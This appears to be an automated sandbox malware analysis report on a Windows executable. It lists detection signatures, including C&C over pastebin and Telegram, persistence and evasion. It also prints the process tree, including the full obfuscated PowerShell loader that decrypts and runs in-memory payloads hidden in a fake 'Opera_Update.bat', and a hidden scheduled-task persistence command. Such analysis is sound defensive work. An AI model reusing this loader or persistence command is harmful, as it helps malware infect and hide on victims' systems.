Windows
Analysis Report
file.exe
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Loading BitLocker PowerShell Module
Powershell drops PE file
Protects its processes via BreakOnTermination flag
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- file.exe (PID: 7452 cmdline: "C:\Users\user\Desktop\file.exe" MD5: BD315453D1C70B1683863D8709E7A3B8)
- cmd.exe (PID: 7468 cmdline: cmd /c "Opera_Update.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7524 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EHtJ11By61kS8vpIjv1e6+WeJMREtPFNuaC1PKqnxU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ddpslYZ3AovF8/F/PVkcRw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nMJpl=New-Object System.IO.MemoryStream(,$param_var); $pYOJO=New-Object System.IO.MemoryStream; $PZyWJ=New-Object System.IO.Compression.GZipStream($nMJpl, [IO.Compression.CompressionMode]::Decompress); $PZyWJ.CopyTo($pYOJO); $PZyWJ.Dispose(); $nMJpl.Dispose(); $pYOJO.Dispose(); $pYOJO.ToArray();}function execute_function($param_var,$param2_var){ $ybABJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XmKpu=$ybABJ.EntryPoint; $XmKpu.Invoke($null, $param2_var);}$NtXQf = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\Opera_Update.bat';$host.UI.RawUI.WindowTitle = $NtXQf;$xcJVx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NtXQf).Split([Environment]::NewLine);foreach ($JtxvS in $xcJVx) { if ($JtxvS.StartsWith('GIzCsOPRFtcNTtsmEyZB')) { $TjCqT=$JtxvS.Substring(20); break; }}$payloads_var=[string[]]$TjCqT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- powershell.exe (PID: 7532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
- powershell.exe (PID: 7692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_414_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Windows_Log_414.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 7932 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Windows_Log_414.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 7984 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Windows_Log_414.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8036 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EHtJ11By61kS8vpIjv1e6+WeJMREtPFNuaC1PKqnxU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ddpslYZ3AovF8/F/PVkcRw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nMJpl=New-Object System.IO.MemoryStream(,$param_var); $pYOJO=New-Object System.IO.MemoryStream; $PZyWJ=New-Object System.IO.Compression.GZipStream($nMJpl, [IO.Compression.CompressionMode]::Decompress); $PZyWJ.CopyTo($pYOJO); $PZyWJ.Dispose(); $nMJpl.Dispose(); $pYOJO.Dispose(); $pYOJO.ToArray();}function execute_function($param_var,$param2_var){ $ybABJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XmKpu=$ybABJ.EntryPoint; $XmKpu.Invoke($null, $param2_var);}$NtXQf = 'C:\Users\user\AppData\Roaming\Windows_Log_414.bat';$host.UI.RawUI.WindowTitle = $NtXQf;$xcJVx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NtXQf).Split([Environment]::NewLine);foreach ($JtxvS in $xcJVx) { if ($JtxvS.StartsWith('GIzCsOPRFtcNTtsmEyZB')) { $TjCqT=$JtxvS.Substring(20); break; }}$payloads_var=[string[]]$TjCqT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- powershell.exe (PID: 8044 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
- wscript.exe (PID: 7852 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\Windows_Log_414.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- rundll32.exe (PID: 8144 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
 | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |

Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
 | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary

Source | Author
---|---
 | Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
 | Christopher Peacock '@securepeacock', SCYTHE
 | Florian Roth (Nextron Systems), Tim Shelton
 | Subhash Popuri (@pbssubhash)
 | Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
 | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
 | Hieu Tran